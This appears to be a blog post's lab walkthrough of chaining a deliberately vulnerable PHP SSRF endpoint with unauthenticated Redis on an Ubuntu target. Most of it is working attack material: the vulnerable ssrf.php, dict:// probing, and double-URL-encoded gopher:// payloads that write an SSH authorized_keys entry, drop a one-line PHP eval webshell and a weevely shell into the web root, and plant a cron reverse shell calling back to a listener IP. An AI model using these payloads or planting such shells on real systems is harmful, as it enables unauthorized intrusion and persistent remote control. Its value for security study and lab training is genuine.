ssrf+redis

Posted by 澤N煜 on 2020-11-30


  • Lab environment
    Target: Ubuntu 16.04, IP 192.168.211.130
    On the target, set up a LAMP stack and install Redis and an SSH server
    Attacker: Kali 2020, IP 192.168.211.134
    On the attacker, install Redis (for redis-cli)
    VPS: Windows 10 (the local host), IP 10.133.164.81
    On Windows, install nc.exe (netcat) for the listener

  • Lab steps
    1. Place the file ssrf.php in the web root
    ssrf.php:

<?php
// Deliberately vulnerable SSRF endpoint: the URL comes straight from the
// query string and is fetched by libcurl with no scheme or host restriction.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET['url']);
// Redirect following stays off, so only the requested URL itself is fetched.
#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
// Response headers are not echoed, only the body.
curl_setopt($ch, CURLOPT_HEADER, 0);
// Left commented out on purpose: enabling this line limits curl to http/https
// and blocks the gopher:// and dict:// requests used in the attack below.
#curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
curl_exec($ch);
curl_close($ch);
?>

2. From the attacker, request the target's ssrf.php to confirm the endpoint fetches external URLs:
http://192.168.211.130/ssrf.php?url=www.baidu.com
(libcurl guesses http:// when the URL carries no scheme, so the body of baidu.com is echoed back.)
3. On the target, go to the Redis install directory and start the server

redis-server redis.conf

On the attacker, go to the Redis install directory and start the server as well

redis-server redis.conf

4. Test from the attacker

redis-cli -h 192.168.211.130

A successful connection means the target's Redis accepts unauthenticated clients from the network (it must be listening on a non-loopback interface with no requirepass, otherwise redis-cli would be refused or asked to authenticate). That direct access is only a lab convenience: the SSRF path below also works when Redis listens on 127.0.0.1 only, because the connection then originates from the web server itself, which is also why Redis's protected mode does not stop it.
Type quit or exit to leave.
5. In the browser, open http://192.168.211.130/ssrf.php?url=127.0.0.1. The response (figure omitted) shows content fetched from the loopback address, so an SSRF vulnerability can be confirmed.
6. In the browser, open
http://192.168.211.130/ssrf.php?url=dict://127.0.0.1:6379/info to probe Redis on its default port 6379. libcurl's DICT handler sends a CLIENT line, then the URL path as a raw command line (leading slash stripped), then QUIT; Redis executes INFO and its server statistics appear in the page, confirming a Redis service on the target.
ssrf+redis attack
7. On the target, as root, create the public-key directory .ssh

mkdir /root/.ssh  

8. On the attacker, as root, create the public-key directory .ssh

mkdir /root/.ssh  

Enter the key directory and generate an SSH key pair with the command below.
I left the key passphrase empty here (it could also be set to something else)

cd /root/.ssh
ssh-keygen -t rsa

9. Write the public key out to ceshi.txt padded with blank lines, and cat ceshi.txt to view it. The padding matters: Redis will later dump the key inside an RDB file that has binary bytes before and after the value, and the surrounding newlines keep the key on a line of its own, so sshd's authorized_keys parser, which skips lines it cannot parse, still accepts it.

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") >ceshi.txt
cat ceshi.txt

10. Request the SSRF endpoint http://192.168.211.130/ssrf.php?url= with a gopher:// URL that carries a payload in the format below, so that the web server's curl talks to Redis on the attacker's behalf.
What a Redis client would normally send to the server is:

set  margin  "\n\n\nssh-rsa <base64 key body from id_rsa.pub> root@kali\n\n\n"
config set dir /root/.ssh/
config set dbfilename "authorized_keys"
save

The gopher URL itself is URL-encoded once, so that PHP's query-string parsing turns

http://192.168.211.130/ssrf.php?url=gopher://127.0.0.1:6379/_payload

into the form the server actually receives:

http://192.168.211.130/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_payload

The payload after the underscore is URL-encoded twice. The first decode happens when PHP builds $_GET['url']; the second happens inside libcurl, which percent-decodes the gopher selector (the path after the one-character item type, here the dummy "_") and writes the raw bytes, followed by CRLF, to the socket. With a single encoding curl would be handed a URL containing literal newlines and quotes, which is unreliable at best; the double encoding keeps the whole URL printable until curl's own decode. Commands are separated by an encoded newline (%0a), so Redis reads them as inline commands, and inside the double-quoted value Redis itself turns the \n escapes into real newlines, exactly as redis-cli would.
Complete URL:

http://192.168.211.130/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%32%30%25%36%64%25%36%31%25%37%32%25%36%37%25%36%39%25%36%65%25%32%30%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%37%33%25%37%33%25%36%38%25%32%64%25%37%32%25%37%33%25%36%31%25%32%30%25%34%31%25%34%31%25%34%31%25%34%31%25%34%32%25%33%33%25%34%65%25%37%61%25%36%31%25%34%33%25%33%31%25%37%39%25%36%33%25%33%32%25%34%35%25%34%31%25%34%31%25%34%31%25%34%31%25%34%34%25%34%31%25%35%31%25%34%31%25%34%32%25%34%31%25%34%31%25%34%31%25%34%32%25%36%37%25%35%31%25%34%34%25%37%32%25%33%36%25%37%33%25%34%66%25%34%31%25%33%33%25%33%32%25%33%35%25%34%64%25%36%38%25%36%33%25%35%31%25%35%35%25%35%35%25%36%62%25%36%65%25%36%31%25%37%38%25%33%31%25%33%38%25%35%61%25%35%39%25%33%39%25%32%62%25%34%39%25%32%66%25%37%34%25%33%38%25%34%63%25%35%35%25%37%61%25%35%30%25%37%31%25%36%31%25%34%34%25%33%31%25%36%35%25%35%38%25%32%66%25%36%33%25%36%66%25%37%36%25%34%31%25%34%34%25%36%62%25%32%66%25%36%65%25%36%32%25%37%31%25%36%33%25%36%34%25%36%66%25%36%38%25%34%37%25%36%38%25%37%61%25%36%39%25%34%33%25%37%31%25%34%65%25%34%39%25%36%39%25%36%33%25%37%37%25%36%34%25%37%33%25%35%33%25%36%66%25%35%33%25%34%37%25%37%35%25%33%39%25%33%34%25%35%39%25%33%31%25%37%33%25%36%31%25%37%35%25%35%61%25%36%36%25%36%66%25%36%33%25%34%34%25%34%39%25%34%39%25%37%38%25%37%33%25%36%36%25%37%36%25%36%31%25%36%33%25%34%36%25%34%35%25%35%32%25%36%38%25%36%64%25%36%61%25%34%66%25%35%38%25%37%35%25%34%66%25%33%32%25%34%64%25%37%37%25%37%38%25%37%37%25%34%32%25%35%32%25%36%61%25%36%38%25%36%32%25%36%63%25%36%31%25%34%64%25%35%35%25%36%65%25%36%36%25%33%33%25%37%61%25%32%66%25%37%30%25%35%37%25%34%38%25%36%61%25%34%37%25%34%33%25%33%30%25%33%33%25%36%66%25%36%63%25%36%65%25%36%62%25%34%33%25%33%37%25%34%61%25%37%61%25%34%33%25%34%39%25%37%38%25%37%39%25%36%34%25%36%62%25%36%66%25%35%37%25%35%32%25%36%61%25%37%35%25%34%35%25%35%61%25%35%33%25%36%32%25%36%61%25%35%39%25%35%33%25%37%36%25%34%36%25%37%36%25%35%37%25%33%37%25%33%30%25%35%30%25%33%30%25%37%30%25%36%38%25%37%39%25%36%61%25%35%31%25%33%36%25%37%35%25%35%39%25%36%35%25%34%32%25%35%38%25%35%61%25%33%33%25%33%32%25%35%37%25%35%37%25%34%35%25%34%32%25%33%33%25%36%39%25%34%32%25%34%34%25%35%37%25%33%37%25%35%32%25%34%37%25%35%35%25%34%39%25%32%66%25%35%35%25%37%31%25%36%64%25%35%34%25%35%39%25%37%32%25%33%35%25%36%34%25%35%37%25%35%36%25%36%65%25%37%61%25%36%32%25%35%30%25%37%33%25%36%35%25%36%32%25%34%65%25%37%31%25%35%36%25%36%63%25%34%33%25%36%32%25%36%36%25%37%36%25%34%32%25%34%33%25%34%37%25%34%31%25%34%37%25%34%33%25%33%33%25%34%32%25%36%64%25%36%64%25%35%61%25%37%33%25%33%32%25%37%38%25%36%66%25%34%34%25%33%38%25%36%37%25%34%36%25%36%63%25%37%34%25%37%32%25%37%35%25%33%34%25%34%32%25%37%32%25%36%31%25%34%32%25%36%38%25%34%64%25%36%33%25%33%33%25%36%31%25%33%35%25%34%62%25%34%33%25%34%61%25%37%32%25%37%30%25%37%35%25%34%38%25%35%36%25%36%62%25%34%33%25%32%62%25%33%35%25%34%38%25%37%38%25%37%32%25%37%61%25%37%30%25%35%34%25%36%62%25%34%36%25%35%35%25%34%39%25%37%38%25%34%39%25%34%36%25%33%32%25%34%64%25%36%37%25%36%34%25%34%33%25%33%34%25%35%38%25%34%35%25%37%34%25%34%36%25%36%37%25%34%61%25%35%35%25%35%30%25%37%39%25%35%38%25%34%35%25%33%39%25%36%62%25%34%63%25%33%39%25%33%34%25%32%66%25%35%39%25%32%66%25%37%38%25%36%37%25%35%36%25%37%34%25%37%38%25%34%36%25%37%61%25%36%35%25%37%39%25%35%39%25%35%35%25%35%32%25%35%30%25%37%39%25%34%65%25%33%30%25%35%30%25%37%33%25%34%63%25%35%33%25%36%37%25%37%39%25%34%61%25%36%66%25%37%30%25%34%39%25%36%62%25%35%33%25%35%34%25%35%31%25%36%38%25%32%66%25%32%62%25%32%66%25%37%35%25%32%62%25%33%34%25%33%36%25%34%64%25%36%63%25%35%38%25%35%37%25%35%61%25%36%32%25%32%62%25%33%38%25%34%63%25%36%61%25%36%34%25%36%31%25%36%36%25%35%33%25%37%39%25%33%39%25%37%36%25%36%37%25%36%63%25%36%32%25%36%39%25%34%33%25%36%39%25%37%32%25%33%37%25%37%35%25%33%39%25%37%32%25%35%31%25%34%37%25%34%32%25%33%38%25%36%35%25%37%31%25%36%66%25%33%38%25%36%39%25%34%32%25%37%61%25%36%36%25%35%33%25%35%61%25%37%30%25%34%34%25%36%64%25%34%61%25%36%39%25%33%30%25%34%37%25%37%31%25%34%36%25%34%61%25%36%39%25%36%66%25%35%37%25%37%33%25%33%35%25%37%39%25%34%36%25%33%30%25%36%37%25%37%35%25%37%37%25%33%30%25%33%36%25%34%66%25%34%35%25%36%66%25%34%33%25%33%35%25%33%32%25%36%33%25%36%36%25%33%38%25%37%31%25%33%32%25%33%35%25%33%36%25%33%38%25%37%61%25%37%33%25%36%34%25%37%30%25%33%38%25%34%32%25%33%34%25%35%36%25%34%32%25%35%37%25%33%31%25%36%33%25%35%33%25%35%34%25%35%30%25%35%34%25%36%31%25%34%31%25%36%34%25%37%36%25%33%39%25%36%31%25%34%35%25%36%32%25%36%65%25%33%36%25%37%31%25%34%31%25%34%65%25%34%63%25%36%61%25%36%39%25%36%37%25%35%33%25%34%39%25%34%36%25%34%64%25%34%31%25%37%30%25%35%37%25%33%33%25%36%35%25%35%35%25%33%35%25%36%61%25%34%35%25%34%35%25%34%33%25%36%31%25%37%37%25%35%38%25%37%34%25%37%33%25%33%39%25%35%61%25%33%37%25%37%36%25%33%39%25%34%33%25%36%36%25%34%62%25%36%34%25%33%32%25%35%61%25%33%33%25%37%32%25%34%38%25%37%35%25%34%39%25%35%36%25%33%34%25%37%30%25%36%63%25%33%38%25%33%35%25%36%35%25%36%64%25%36%34%25%37%36%25%33%35%25%33%31%25%36%36%25%35%38%25%37%39%25%35%30%25%36%39%25%35%36%25%33%31%25%37%37%25%36%36%25%33%30%25%36%64%25%33%32%25%37%61%25%37%33%25%33%64%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%34%30%25%36%62%25%36%31%25%36%63%25%36%39%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%32%25%36%66%25%36%66%25%37%34%25%32%66%25%32%65%25%37%33%25%37%33%25%36%38%25%32%66%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%32%32%25%36%31%25%37%35%25%37%34%25%36%38%25%36%66%25%37%32%25%36%39%25%37%61%25%36%35%25%36%34%25%35%66%25%36%62%25%36%35%25%37%39%25%37%33%25%32%32%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35

11. Open the URL directly in the browser, or run it from the attacker with

curl "<complete URL>"

The page will appear to time out (Redis keeps the connection open after answering, so curl waits until PHP's or its own timeout expires), but the public key has still been written into .ssh.
Because I had been waiting for quite a while here, I just put the public key into .ssh directly.
12. On the target, start (or restart) the SSH service

systemctl restart sshd.service

From the attacker, log in to the target with the private key

ssh -i id_rsa root@192.168.211.130

Passwordless login did not work here, though; I think that is because I copied the public key over myself rather than delivering it through Redis.
But in the end I could still log in.
Run ifconfig to see the target's IP.
Writing a webshell into the web root
13. In the same way, rebuild the payload of the URL above.
Original payload (a one-line PHP shell dropped into the target's web root):

set x "\n\n\n<?php @eval($_POST['redis']);?>\n\n\n"
config set dir /var/www/html  
config set dbfilename shell.php
save

Complete URL:

http://192.168.211.130/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%33%63%25%33%66%25%37%30%25%36%38%25%37%30%25%32%30%25%34%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32%34%25%35%66%25%35%30%25%34%66%25%35%33%25%35%34%25%35%62%25%32%37%25%37%32%25%36%35%25%36%34%25%36%39%25%37%33%25%32%37%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%30%25%32%30%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%37%30%25%36%38%25%37%30%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35

Here I used weevely, the webshell tool on Kali (the attacker), to generate a file 1.php as the webshell instead.
In Kali, generate the webshell with the password "password":

weevely generate password /root/Desktop/1.php

Once it looks like the figure the shell has been generated; cat 1.php shows its content.

Build the payload exactly as above and deliver this webshell into the web root.
payload:

set x "\n\n\n<contents of 1.php>\n\n\n"
config set dir /var/www/html  
config set dbfilename 1.php
save

URL-encode it twice to form the complete link and send it. Any double quotes or backslashes inside 1.php must be escaped for Redis's quoted-string syntax first, otherwise the inline command breaks.

http://192.168.211.130/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_<payload after two rounds of URL encoding>

Here I simply moved the file into the target's web root instead.
14. From the attacker, connect with weevely

weevely http://192.168.211.130/1.php password

Type dir to list the files in the web root, and quit to exit.
If you are interested, try the one-line shell above as well and work out its password yourself.
Reverse shell via cron
15. On Windows, in the nc install directory, run ./nc.exe -lvp 6666 to listen on port 6666

./nc.exe -lvp 6666

16. Build the payload
Plain payload:

set xxx "\n\n* * * * * bash -i>& /dev/tcp/10.133.164.81/6666 0>&1\n\n"
config set dir /var/spool/cron
config set dbfilename root
save

Complete URL after two rounds of URL encoding

http://192.168.211.130/ssrf.php?url=gopher%3a%2f%2f127.0.0.1%3a6379%2f_%25%37%33%25%36%35%25%37%34%25%32%30%25%37%38%25%37%38%25%37%38%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%36%32%25%36%31%25%37%33%25%36%38%25%32%30%25%32%64%25%36%39%25%33%65%25%32%36%25%32%30%25%32%66%25%36%34%25%36%35%25%37%36%25%32%66%25%37%34%25%36%33%25%37%30%25%32%66%25%33%31%25%33%30%25%32%65%25%33%31%25%33%33%25%33%33%25%32%65%25%33%31%25%33%36%25%33%34%25%32%65%25%33%38%25%33%31%25%32%66%25%33%36%25%33%36%25%33%36%25%33%36%25%32%30%25%33%30%25%33%65%25%32%36%25%33%31%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%33%25%37%30%25%36%66%25%36%66%25%36%63%25%32%66%25%36%33%25%37%32%25%36%66%25%36%65%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35

Request this URL from the attacker while the Windows listener is running; when the cron entry fires, the target's shell connects back to the listener. One caveat: the target here is Ubuntu, whose cron keeps user crontabs under /var/spool/cron/crontabs and is widely reported to reject a crontab file that contains unparseable lines such as the RDB header, so this cron variant is known to work on CentOS/RHEL but usually fails on Debian/Ubuntu; the authorized_keys and webshell writes are the dependable routes there.